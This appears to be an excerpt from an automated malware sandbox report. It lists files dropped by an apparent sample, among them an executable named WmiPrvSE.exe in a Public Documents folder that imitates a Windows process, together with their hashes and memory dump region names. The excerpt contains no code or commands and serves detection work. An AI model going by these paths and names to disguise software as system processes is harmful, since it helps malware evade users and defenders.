C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe

MD5 6a45590b819f385305ef39c912c134e8
SHA1 7916b19ad989ecd1eff12a7de52668f674335f2f
SHA256 e3258f7c8e2be3a5eeaa697b80fc1b3cc64b84a933e551c802c7479b86768db4
SHA512 1849029c7e433f5681848f0c8945d565873b2ec7164f9db71abbd3f5b59e3ad83b03f0be62666d2fc77b409565207500a2d29b30ce0a43aa8a67e7e999dd3dad

C:\Program Files\common files\system\jk.ini

MD5 82badd2e99953adcf4a57f34e8a174a0
SHA1 270d320eb655aef221e0cffd81aa51c94cad7771
SHA256 aca054455f96f96fc90b275b6a54f549267ed59fd56e3e6e5b5ef685e65ee6bc
SHA512 30595ae24dff1ad39c701bb7e6b53cd719ff4d4ac710b922cb43564636de4d4c400c07fb7e8a10eb4aaca0d47622b044651f46e1421897f20a4736aafed6a665

memory/2372-14-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/4048-16-0x0000000000400000-0x0000000000498000-memory.dmp

memory/2372-19-0x0000000000400000-0x00000000004D3000-memory.dmp

C:\Program Files\ls.txt

MD5 0412a1820b20f446e5fa3fc29e650514
SHA1 4dca3fc6f12dd9685d76752db2d5f20fbfa3813f
SHA256 9ec6fd2f1a39cb14281281fce280a6a05960e2d9339748cb2a3603b61ddaa377
SHA512 0509593450677fea2aad4d9587315fbd85872a650961948b21c50e785208c30741a936650892429b77a3291cad5e784017696fb920bf30ff0c3ab8e2d9213e3e

memory/2372-31-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/2372-37-0x0000000000400000-0x00000000004D3000-memory.dmp